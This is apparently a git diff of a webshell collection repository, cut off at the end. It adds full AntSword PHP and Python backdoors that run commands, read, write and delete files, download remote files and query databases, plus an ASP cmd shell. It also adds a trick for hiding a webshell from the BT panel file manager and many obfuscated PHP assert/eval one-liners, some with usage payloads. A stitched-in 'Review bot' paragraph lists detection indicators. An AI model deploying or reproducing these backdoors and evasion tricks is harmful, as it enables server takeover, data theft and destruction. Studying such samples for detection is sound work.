$password="";
if (preg_match('/<H>(.+?)<\/H>/i', $conf, $data)) {
$host = $data[1];
}
if (preg_match('/<U>(.+?)<\/U>/i', $conf, $data)) {
$user = $data[1];
}
if (preg_match('/<P>(.+?)<\/P>/i', $conf, $data)) {
$password = $data[1];
}
$encode = decode(EC($encode));
$port=split(":",$host)[1];
$host=split(":",$host)[0];
$conn = @mysqli_connect($host, $user, $password, "", $port);
$res = @mysqli_query($conn, $sql);
if (is_bool($res)) {
return "Status".$columnsep.$rowsep.($res?"True":"False").$columnsep.$rowsep;
}
$i=0;
if ($needcoluname) {
while ($col=@mysqli_fetch_field($res)) {
$ret .= $col->name.$columnsep;
$i++;
}
$ret .= $rowsep;
}
while($rs=@mysqli_fetch_row($res)){
for($c = 0; $c <= $i; $c++){
$ret .= trim($rs[$c]).$columnsep;
}
$ret.=$rowsep;
}
return $ret;
}
function BaseInfo(){
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D==""){
$D=dirname($_SERVER["PATH_TRANSLATED"]);
}
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}else{
$R.="/";
}
$R.="\t";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="\t{$s}";
return $R;
}
function FileTreeCode($D){
$ret = "";
$F=@opendir($D);
if($F==NULL){
$ret = "ERROR:// Path Not Found Or No Permission!";
}else{
$M=NULL;
$L=NULL;
while($N=@readdir($F)){
$P=$D."/".$N;
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R="\t".$T."\t".@filesize($P)."\t".$E."\n";
if(@is_dir($P))
$M.=$N."/".$R;
else
$L.=$N.$R;
}
$ret .= $M.$L;
@closedir($F);
}
return $ret;
}
function ReadFileCode($F){
$ret = "";
try {
$P = @fopen($F,"r");
$ret = (@fread($P,filesize($F)));
@fclose($P);
} catch (Exception $e) {
$ret = "ERROR://".$e;
}
return $ret;
}
function WriteFileCode($path, $content){
return @fwrite(fopen(($path),"w"),($content))?"1":"0";
}
function DeleteFileOrDirCode($fileOrDirPath){
function df($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
if((is_dir($pf))&&($f!=".")&&($f!="..")){
@chmod($pf,0777);
df($pf);
}
if(is_file($pf)){
@chmod($pf,0777);
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
$F=(get_magic_quotes_gpc()?stripslashes($fileOrDirPath):$fileOrDirPath);
if(is_dir($F)){
return (df($F));
}
else{
return (file_exists($F)?@unlink($F)?"1":"0":"0");
}
}
function DownloadFileCode($filePath){
$F=(get_magic_quotes_gpc()?stripslashes($filePath):$filePath);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else{
echo("ERROR:// Can Not Read");
}
}
function UploadFileCode($path, $content){
$f=$path;
$c=$content;
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
return (@fwrite(fopen($f,"a"),$buf)?"1":"0");
}
function CopyFileOrDirCode($path, $content){
$m=get_magic_quotes_gpc();
$fc=($m?stripslashes($path):$path);
$fp=($m?stripslashes($content):$content);
function xcopy($src,$dest){
if(is_file($src)){
if(!copy($src,$dest))
return false;
else
return true;
}
$m=@dir($src);
if(!is_dir($dest))
if(!@mkdir($dest))
return false;
while($f=$m->read()){
$isrc=$src.chr(47).$f;
$idest=$dest.chr(47).$f;
if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){
if(!xcopy($isrc,$idest))return false;
}else if(is_file($isrc)){
if(!copy($isrc,$idest))
return false;
}
}
return true;
}
return (xcopy($fc,$fp)?"1":"0");
}
function RenameFileOrDirCode($oldName, $newName){
$m=get_magic_quotes_gpc();
$src=(m?stripslashes($oldName):$oldName);
$dst=(m?stripslashes($newName):$newName);
return (rename($src,$dst)?"1":"0");
}
function CreateDirCode($name){
$m=get_magic_quotes_gpc();
$f=($m?stripslashes($name):$name);
return (mkdir($f)?"1":"0");
}
function ModifyFileOrDirTimeCode($fileOrDirPath, $newTime){
$m=get_magic_quotes_gpc();
$FN=(m?stripslashes($fileOrDirPath):$fileOrDirPath);
$TM=strtotime((m?stripslashes($newTime):$newTime));
if(file_exists($FN)){
return (@touch($FN,$TM,$TM)?"1":"0");
}else{
return ("0");
}
}
function WgetCode($urlPath, $savePath){
$fR=$urlPath;
$fL=$savePath;
$F=@fopen($fR,chr(114));
$L=@fopen($fL,chr(119));
if($F && $L){
while(!feof($F))
@fwrite($L,@fgetc($F));
@fclose($F);
@fclose($L);
return "1";
}else{
return "0";
}
}
function ExecuteCommandCode($cmdPath, $command){
$p=$cmdPath;
$s=$command;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
return ($ret!=0)?"ret={$ret}":"";
}
function probedb(){
$ret="";
$m=array(
'mysql_close','mysqli_close','mssql_close','sqlsrv_close','ora_close','oci_close',
'ifx_close','sqlite_close','pg_close','dba_close','dbmclose','filepro_fieldcount',
'sybase_close'
);
foreach ($m as $f) {
$ret.=($f."\t".(function_exists($f)?'1':'0')."\n");
}
if(function_exists('pdo_drivers')){
foreach(@pdo_drivers() as $f){
$ret.=("pdo_".$f."\t1\n");
}
}
return $ret;
}
function listcmd($binarr){
$ret="";
$arr=@explode(",", $binarr);
foreach($arr as $v){
$ret.=($v."\t".(@file_exists($v)?"1":"0")."\n");
}
return $ret;
}
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$funccode = EC($_REQUEST[$pwd]);
$z0 = EC(decode($_REQUEST['z0']));
$z1 = EC(decode($_REQUEST['z1']));
$z2 = EC(decode($_REQUEST['z2']));
$z3 = EC(decode($_REQUEST['z3']));
// echo "<meta HTTP-EQUIV=\"csontent-type\" content=\"text/html; charset={$cs}\">";
echo "->"."|";
$ret = "";
try {
switch ($funccode) {
case 'A':
$ret = BaseInfo();
break;
case 'B':
$ret = FileTreeCode($z1);
break;
case 'C':
$ret = ReadFileCode($z1);
break;
case 'D':
$ret = WriteFileCode($z1, $z2);
break;
case 'E':
$ret = DeleteFileOrDirCode($z1);
break;
case 'F':
DownloadFileCode($z1);
break;
case 'U':
$ret = UploadFileCode($z1, $z2);
break;
case 'H':
$ret = CopyFileOrDirCode($z1, $z2);
break;
case 'I':
$ret = RenameFileOrDirCode($z1, $z2);
break;
case 'J':
$ret = CreateDirCode($z1);
break;
case 'K':
$ret = ModifyFileOrDirTimeCode($z1, $z2);
break;
case 'L':
$ret = WgetCode($z1, $z2);
break;
case 'M':
$ret = ExecuteCommandCode($z1, $z2);
break;
case 'N':
$ret = showDatabases($z0, $z1);
break;
case 'O':
$ret = showTables($z0, $z1, $z2);
break;
case 'P':
$ret = showColumns($z0, $z1, $z2, $z3);
break;
case 'Q':
$ret = query($z0, $z1, $z2);
break;
case 'Y':
$ret = listcmd($z1);
break;
case 'Z':
$ret = probedb();
break;
default:
// $ret = "Wrong Password";
break;
}
} catch (Exception $e) {
$ret = "ERROR://".$e;
}
echo $ret;
echo "|"."<-";
?>
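Review bot: The header comment documents the connector settings but not the sample's observable behaviour, which is what a corpus reader building detections needs; a short `* Indicators:` paragraph in the header would help. The dispatcher keys on `$_REQUEST[$pwd]` with single-letter opcodes and on `z0`–`z3`, every reply is literally framed by `->|` and `|<-` (the two `echo` calls around the `switch`), and the output charset is taken from a `charset` request parameter, so these names and strings are the stable values for a WAF or log rule. On the mitigation side, opcode `M` reaches the OS only through `@system()` with `2>&1` appended in `ExecuteCommandCode`, so a `disable_functions` entry covering `system` neutralises that branch, whereas the file-system branches and the `mysqli_*` calls are unaffected by it and have to be contained with filesystem permissions and `open_basedir`. Because of `@ini_set("display_errors", "0")` and the `@` suppression throughout, failures surface only as `0`/empty return strings to the client, never in the server error log.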


@@ -0,0 +1,349 @@
#!/usr/bin/env python
# coding:utf-8
from __future__ import print_function
import os
import cgi
import time
import stat
import getpass
import base64
import binascii
import shutil
import urllib
import platform
import cgitb
import sys
cgitb.enable()
reload(sys)
sys.setdefaultencoding('utf-8')
VERSION = "0.0.2"
u'''
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
—————————————————————————————————————————————————
AntSword Python2 CGI Custom Script No DataBase
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
—————————————————————————————————————————————————
使用说明:
1. AntSword >= v1.1-dev, Python == 2.x
2. 创建 Shell 时选择 custom 模式连接
3. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
4. 本脚本不含数据库管理操作
使用方法:
1. 修改 PWD, ENCODER, ENCODE
2. 复制本脚本到 cgi-bin 目录下(根据中间件配置来定)
3. 赋予可执行权限 chmod +x xxx.py
CHANGELOG:
Date 2018/12/30 v0.0.2
1. 修复 windows 下命令执行参数问题
2. 解决 windows 下文件名中文编码问题 (win10以下系统建议使用 gb2312 gbk 编码)
3. 修复 windows 下获取当前用户获取不到时致命错误
Date 2018/12/29 v0.0.1
1. 文件系统 和 terminal 管理
2. 支持 hex 和 base64 编码器
3. 脚本内统一使用 unicode 编码来处理
'''
PWD = "ant" # 连接密码
ENCODER = "" # 编码器, 3选1
# ENCODER = "hex" # 推荐使用此编码器
# ENCODER = "base64"
ENCODE = "utf-8" # 字符编码
OUT_PREFIX = "->" + "|" # 数据分割前缀符
OUT_SUFFIX = "|" + "<-" # 数据分割后缀符
def Decoder(enstr):
u'''解码方法,解AntSword 编码器编码后的数据
@param enstr string 已经经过编码器编码的数据
@return ret string 解码后的数据
'''
if(ENCODER == "base64"):
return base64.b64decode(enstr)
elif (ENCODER == "hex"):
return binascii.a2b_hex(enstr)
else:
return enstr
def TimeStampToTime(timestamp):
timeStruct = time.localtime(timestamp)
return time.strftime(u'%Y-%m-%d %H:%M:%S',timeStruct)
def BaseInfo():
u'''获取系统基础信息
@return ret string Shell或网站根目录\t盘符\tuname信息\t当前用户
'''
ret = ""
d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
if(d == ""):
d = os.getcwd()
ret = "%s\t" % d
if(d.startswith('/')):
ret += "/"
else:
for L in range(ord('C'), ord('Z') + 1):
if(os.path.isdir("%s:" % chr(L))):
ret += "%s:" % chr(L)
ret += "\t"
ret += "%s\t" % ' '.join(platform.uname())
if platform.system().lower() == 'windows':
u = "Unknow" # windows 下没 pwd 使用 getpass.getuser 会出错
for name in ('LOGNAME','USER','LNAME','USERNAME'):
user = os.environ.get(name)
if user:
u = user
break
ret += u
else:
ret += getpass.getuser()
return ret
def FileTreeCode(d):
u'''获取指定目录下的文件和目录信息
@param d string 文件路径
@return ret string 文件名\t创建时间\t文件大小\t文件权限(RWX 或 8进制)
'''
ret = u""
# 如果文件名/目录是中文,则需要 encode 成系统的编码后再去处理
if(os.path.exists(d.encode(ENCODE))):
for fname in os.listdir(d.encode(ENCODE)):
fname = fname.decode(ENCODE)
p = os.path.join(d, fname)
try:
fst = os.stat(p.encode(ENCODE))
name = fname
if stat.S_ISDIR(fst.st_mode):
name += "/"
ret += u"{}\t{}\t{}\t{}\n".format(name, TimeStampToTime(fst.st_mtime), fst.st_size, oct(fst.st_mode)[-4:])
except:
ret += u"{}\t{}\t{}\t{}\n".format(fname, TimeStampToTime(0), 0, 0)
else:
ret = "ERROR:// Path Not Found or No Permission!"
return ret.encode(ENCODE)
def ReadFileCode(fpath):
u'''获取指定路径文件内容
@param fpath string 文件路径
@return ret string 成功返回文件内容,失败抛出异常
'''
with open(fpath.encode(ENCODE), 'r') as fp:
return fp.read()
def WriteFileCode(path, content):
u'''向指定文件路径下写入content的内容
@param path string 文件路径
@param content string 文件内容(整个文件内容)
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
with open(path.encode(ENCODE), "w") as fp:
fp.write(content.encode(ENCODE))
return "1"
def DeleteFileOrDirCode(path):
u'''删除指定路径下的文件或目录
@param path string 文件或目录路径
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
if os.path.isdir(path.encode(ENCODE)):
shutil.rmtree(path.encode(ENCODE))
else:
os.remove(path.encode(ENCODE))
return "1"
def DownloadFileCode(path):
u'''下载指定路径的文件
@param path string 文件路径
@return None 直接在本方法内输出文件的二进制内容,失败则抛出异常
'''
with open(path.encode(ENCODE), 'r') as fp:
print(fp.read(),end='')
def UploadFileCode(path, content):
u'''上传文件
@param path string 文件路径 eg: /tmp/123
@param content hexstring 文件内容(分段) eg: 416e74 内容为 Ant
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
data = binascii.a2b_hex(content)
with open(path.encode(ENCODE), "a") as f:
f.write(data)
return "1"
def CopyFileOrDirCode(oldPath, newPath):
u'''复制文件或目录
@param oldPath string 原文件/目录路径 eg: /etc/passwd
@param newPath string 新文件/目录路径 eg: /tmp/passwd
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
if os.path.isdir(oldPath.encode(ENCODE)):
shutil.copytree(oldPath.encode(ENCODE), newPath.encode(ENCODE),symlinks=True)
else:
shutil.copy(oldPath.encode(ENCODE), newPath.encode(ENCODE))
return "1"
def RenameFileOrDirCode(oldPath, newPath):
u'''重命名文件或目录
@param oldPath string 原文件/目录路径 eg: /tmp/123
@param newPath string 新文件/目录路径 eg: /tmp/456
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
os.rename(oldPath.encode(ENCODE), newPath.encode(ENCODE))
return "1"
def CreateDirCode(path):
u'''新建目录
@param path string 新目录路径 eg: /tmp/123
@return ret string 成功返回 1 失败返回 0 或抛出异常
'''
os.makedirs(path.encode(ENCODE))
return "1"
def ModifyFileOrDirTimeCode(path, newTime):
u'''修改文件或目录的 最后一次修改时间
@param path string 文件/目录路径 eg: /tmp/123
@param newTime string 时间字符串 eg: 2018-12-12 20:48:54
@return ret string 成功返回 1 失败返回 0
'''
atime = int(time.mktime(time.strptime(newTime, '%Y-%m-%d %H:%M:%S')))
os.utime(path.encode(ENCODE), (atime, atime))
return "1"
def WgetCode(url, savepath):
u'''服务端 Wget
@param url string url 地址 eg: http://xxx.com/1.jpg
@param savepath string 文件路径 eg: /tmp/2.jpg
@return ret string 成功返回 1 失败返回 0
'''
urllib.urlretrieve(url, filename=savepath.encode(ENCODE))
return "1"
def ExecuteCommandCode(cmdPath, command):
u'''执行命令
@param cmdPath string 执行命令的shell路径 eg: /bin/sh
@param command string 执行的命令内容 eg: cd "/usr/";pwd;whoami
@return ret string 执行命令返回结果
'''
d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
if(d == ""):
d = os.getcwd()
cmd = []
if d[0] == "/":
cmd = [cmdPath, '-c', '%s' % command]
else:
cmd = '''%s /c "%s"''' % (cmdPath, command)
c_stdin, c_stdout, c_stderr = os.popen3(cmd)
c_stdin.close()
result = c_stdout.read()
c_stdout.close()
errmsg = c_stderr.read()
c_stderr.close()
return result + errmsg
def showDatabases(encode, conf):
u'''列出当前数据库系统下所有数据库
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@return ret string 执行结果, \t 为字段分割符
例如某连接下有3个数据库(mysql,test,information_schema),
则返回结果为:
mysql\ttest\tinformation_schema
'''
return "ERROR:// Not Implement"
def showTables(encode, conf, dbname):
u'''列出当前数据库下所有表
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@return ret string 执行结果, \t 为字段分割符
例如某数据库下有3张表(user,admin,member),则返回结果为:
user\tadmin\tmember
'''
return "ERROR:// Not Implement"
def showColumns(encode, conf, dbname, table):
u'''列出当前表下所有列
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@param table string 表名 eg: user
@return ret string 执行结果, \t 为字段分割符
例如某张表有3个字段(id,user,password), 则返回数据如下:
id\tuser\tpassword
'''
return "ERROR:// Not Implement"
def query(encode, conf, sql):
u'''执行 sql 语句
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param sql string 要执行的sql语句
@return ret string 执行结果, \t|\t 为列分割符, \r\n为行分割符, 第一行为列名
例如某张表有3个字段(id,user,password), 查询的结果有2条数据,则返回数据如下:
id\t|\tuser\t|\tpassword\r\n1\t|\tadmin\t|\t123456\r\n2\t|\tuser\t|\t123456\r\n
'''
return "ERROR:// Not Implement"
if __name__ == "__main__":
print("Content-Type: text/html;charset=%s" % ENCODE)
print()
print(OUT_PREFIX.decode(ENCODE), end='')
ret = ""
try:
form = cgi.FieldStorage()
funcode = form.getvalue(PWD)
z0 = Decoder(form.getvalue("z0","").decode())
z1 = Decoder(form.getvalue("z1","").decode())
z2 = Decoder(form.getvalue("z2","").decode())
z3 = Decoder(form.getvalue("z3","").decode())
if(funcode == "A"):
ret = BaseInfo()
elif(funcode == "B"):
ret = FileTreeCode(z1)
elif(funcode == 'C'):
ret = ReadFileCode(z1)
elif(funcode == 'D'):
ret = WriteFileCode(z1, z2)
elif(funcode == 'E'):
ret = DeleteFileOrDirCode(z1)
elif(funcode == 'F'):
DownloadFileCode(z1)
elif(funcode == 'U'):
ret = UploadFileCode(z1, z2)
elif(funcode == 'H'):
ret = CopyFileOrDirCode(z1, z2)
elif(funcode == 'I'):
ret = RenameFileOrDirCode(z1, z2)
elif(funcode == 'J'):
ret = CreateDirCode(z1)
elif(funcode == 'K'):
ret = ModifyFileOrDirTimeCode(z1, z2)
elif(funcode == 'L'):
ret = WgetCode(z1, z2)
elif(funcode == 'M'):
ret = ExecuteCommandCode(z1, z2)
elif(funcode == 'N'):
ret = showDatabases(z0, z1)
elif(funcode == 'O'):
ret = showTables(z0, z1, z2)
elif(funcode == 'P'):
ret = showColumns(z0, z1, z2, z3)
elif(funcode == 'Q'):
ret = query(z0, z1, z2)
else:
pass
except Exception, e:
ret = "ERROR:// %s" % getattr(e, 'strerror', str(e))
print(ret, end="")
print(OUT_SUFFIX.decode(ENCODE))


@@ -39,7 +39,7 @@ end Function
<%Response.Write(Request.ServerVariables("server_software"))%> <%Response.Write(Request.ServerVariables("server_software"))%>
</p> </p>
<p> <p>
<b>The server's software:</b> <b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd") <% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD) thisDir = getCommandOutput("cmd /c" & szCMD)

1
backlion/webshell Submodule

Submodule backlion/webshell added at 4ced903c80

18
bt_yincang_shell.md Normal file

@@ -0,0 +1,18 @@
bt 面板隐藏webshell小技巧
最近宝塔的phpmyadmin大家应该都已经知道了。我就不炒冷饭最近也没有研究什么比较有含量的就分享一个宝塔面板隐藏webshell的小技巧比较水。
创建一个文件名为```.<a.php```的文件
![image](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8xjy4y3M4s8KQnT5tBHFiaO2p0AolDy0HBDsbBGZ3mcOeHicoyMic2bvIg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
解压出来以后,宝塔的文件管理面板中是不会出现的
![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8ibRCosCwfqfehHput38DJicXQiaeLiaT2SIZFiaOribt3udemBmzK8glHiaicg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
但是文件是存在的
而且可以正常访问
![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8bDBrx4LOThfraAEQk7ribZibyKuUrdeC8GpWeibHXsmyGRb9zA6NzpoUg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)

2
bypass.md Normal file

@@ -0,0 +1,2 @@
### 1. [一个经典的过人 WebShell by tr0y](https://www.tr0y.wang/2020/07/14/webshell-bypass-human/)
### 2. [WebShell免杀 by 4hou.win](https://4hou.win/wordpress/?p=47975)

Binary file not shown.

Binary file not shown.

BIN
content/WebShell免杀.pdf Normal file

Binary file not shown.

File diff suppressed because it is too large Load Diff

Binary file not shown.

1
content/readme.md Normal file

@@ -0,0 +1 @@
### 故名思意,收集一些方法技术pdf存档查看


@@ -0,0 +1,3 @@
share project bypass waf
https://github.com/LandGrey/webshell-detect-bypass

Binary file not shown.

Binary file not shown.


@@ -1 +0,0 @@
shell.endp.top

1
lhlsec/webshell Submodule

Submodule lhlsec/webshell added at 4669c5f8e3

1
malwares/WebShell Submodule

Submodule malwares/WebShell added at 2c064553f7

1
oneoneplus/webshell Submodule

Submodule oneoneplus/webshell added at 6f030b91c1


@@ -1,20 +0,0 @@
add other webshell collect repository
url : https://github.com/tdifg/WebShell
add public-shell repository
url : https://github.com/BDLeet/public-shell
add web-backdoors
url : https://github.com/all3g/fuzzdb/tree/master/web-backdoors
add web-shell
url : https://github.com/BlackArch/webshells
add webshellSample
url : https://github.com/tanjiti/webshellSample
add Ridter'Pentest backdoor tools
url : https://github.com/Ridter/Pentest/tree/master/backdoor
add xl7dev'WebShell
https://github.com/xl7dev/WebShell 小乐天 From: Knownsec

27
other shell repository.md Normal file

@@ -0,0 +1,27 @@
add other webshell collect repository
url : [https://github.com/tdifg/WebShell](https://github.com/tdifg/WebShell)
add public-shell repository
url : [https://github.com/BDLeet/public-shell](https://github.com/BDLeet/public-shell)
add web-backdoors
url : [https://github.com/all3g/fuzzdb/tree/master/web-backdoors](https://github.com/all3g/fuzzdb/tree/master/web-backdoors)
add web-shell
url : [https://github.com/BlackArch/webshells](https://github.com/BlackArch/webshells
add webshellSample
url : [https://github.com/tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
add Ridter'Pentest backdoor tools
url : [https://github.com/Ridter/Pentest/tree/master/backdoor](https://github.com/Ridter/Pentest/tree/master/backdoor)
add xl7dev'WebShell
url : [https://github.com/xl7dev/WebShell](https://github.com/xl7dev/WebShell) 小乐天 From: Knownsec

1
php/2020-08-31-01.php Normal file

@@ -0,0 +1 @@
<?php $a="~+d()"^"!{+{}";$b=${$a}["a"];eval("".$b);?>

4
php/2020.08.20.01.php Normal file

@@ -0,0 +1,4 @@
<?php
$a = substr('1a',1).'s'.'s'.'e'.'r'.'t';
$a($_POST['x']);
?>

4
php/2020.08.20.02.php Normal file

@@ -0,0 +1,4 @@
<?php
$a = strtr('azxcvt','zxcv','sser');
$a($_POST['x']);
?>

4
php/2020.08.20.03.php Normal file

@@ -0,0 +1,4 @@
<?php
$a = substr_replace("asxxx","sert",2);
$a($_POST['x']);
?>

4
php/2020.08.20.04.php Normal file

@@ -0,0 +1,4 @@
<?php
$a = trim(' assert ');
$a($_POST['x']);
?>

7
php/2020.08.20.05.php Normal file

@@ -0,0 +1,7 @@
<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>

6
php/2020.08.20.06.php Normal file

@@ -0,0 +1,6 @@
<?php
function sqlsec($a){
assert($a);
}
sqlsec($_POST['x']);
?>

3
php/2020.08.20.07.php Normal file

@@ -0,0 +1,3 @@
<?php
call_user_func('assert',$_POST['x']);
?>

3
php/2020.08.20.08.php Normal file

@@ -0,0 +1,3 @@
<?php
call_user_func_array(assert,array($_POST['x']));
?>

3
php/2020.08.20.09.php Normal file

@@ -0,0 +1,3 @@
<?php
array_filter(array($_POST['x']),'assert');
?>

5
php/2020.08.20.10.php Normal file

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>

5
php/2020.08.20.11.php Normal file

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);
?>

9
php/2020.08.20.12.php Normal file

@@ -0,0 +1,9 @@
<?php
function sqlsec($value,$key)
{
$x = $key.$value;
$x($_POST['x']);
}
$a=array("ass"=>"ert");
array_walk($a,"sqlsec");
?>

5
php/2020.08.20.13.php Normal file

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x'] => '|.*|e',);
array_walk($arr, $e, '');
?>

28
php/2020.08.20.14.php Normal file

@@ -0,0 +1,28 @@
<?php
mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
?>
<?php
preg_filter('|\d|e', $_REQUEST['x'], '2');
?>
use like:
```
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x'] => '|.*|e',);
array_walk($arr, $e, '');
?>
此时提交如下 payload 的话:
Php
shell.php?e=preg_replace
最后就相当于执行了如下语句:
Php
preg_replace('|.*|e',$_POST['x'],'')
这个时候只需要 POST x=phpinfo();
```

3
php/2020.08.20.15.php Normal file

@@ -0,0 +1,3 @@
<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>

5
php/2020.08.20.16.php Normal file

@@ -0,0 +1,5 @@
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>

62
php/2020.08.20.17.php Normal file

@@ -0,0 +1,62 @@
<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['x']);
?>
post: e=assert&x=phpinfo();
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
?>
post: e=assert&x=phpinfo();
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['x']);
uasort($arr, base64_decode($e));
?>
post: e=YXNzZXJ0&x=phpinfo();
<?php
$arr = new ArrayObject(array('test', $_REQUEST['x']));
$arr->uasort('assert');
?>
<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['x'] => 2);
uksort($arr, $e);
?>
post: e=assert&x=phpinfo();
<?php
$arr = new ArrayObject(array('test' => 1, $_REQUEST['x'] => 2));
$arr->uksort('assert');
?>
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['x']);
?>
<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['x']);
?>
<?php
filter_var($_REQUEST['x'], FILTER_CALLBACK, array('options' => 'assert'));
?>
<?php
filter_var_array(array('test' => $_REQUEST['x']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
?>

4
php/2020.08.20.18.php Normal file

@@ -0,0 +1,4 @@
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$a($_POST['x']);
?>

6
php/2020.08.20.19.php Normal file

@@ -0,0 +1,6 @@
<?php
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
$b='_'.'P'.'O'.'S'.'T';
$c=$$b;
$a($c['x']);
?>

4
php/2020.08.20.20.php Normal file

@@ -0,0 +1,4 @@
<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['x']);

15
php/Shu1337.php Normal file

File diff suppressed because one or more lines are too long

25
php/YXNzZXJ0YWE.php Normal file

@@ -0,0 +1,25 @@
<?php
/**
* YXNzZXJ0YWE=
*/
class Example
{
public function fn()
{
}
}
$reflector = new ReflectionClass('Example');
$zhushi = substr(($reflector->getDocComment()), 7, 12);
$zhushi = base64_decode($zhushi);
$zhushi = substr($zhushi, 0, 6);
//
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
print_r($$_request);
}
}
$zhushi($_value);

9
php/ass.php Normal file

@@ -0,0 +1,9 @@
<?php
/**
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
*
*/
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>


@@ -0,0 +1,69 @@
<?php
class ZQIH{
public $a = null;
public $b = null;
public $c = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LGZOJH = @base32_decode($this->a);
@eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");
}}}
new ZQIH();
function base32_encode($input) {
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 8;
$v += ord($input[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$output .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);
}
}
if ($vbits > 0) {
$v <<= (5 - $vbits);
$output .= $BASE32_ALPHABET[$v];
}
return $output;
}
function base32_decode($input) {
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 5;
if ($input[$i] >= 'a' && $input[$i] <= 'z') {
$v += (ord($input[$i]) - 97);
} elseif ($input[$i] >= '2' && $input[$i] <= '7') {
$v += (24 + $input[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8) {
$vbits -= 8;
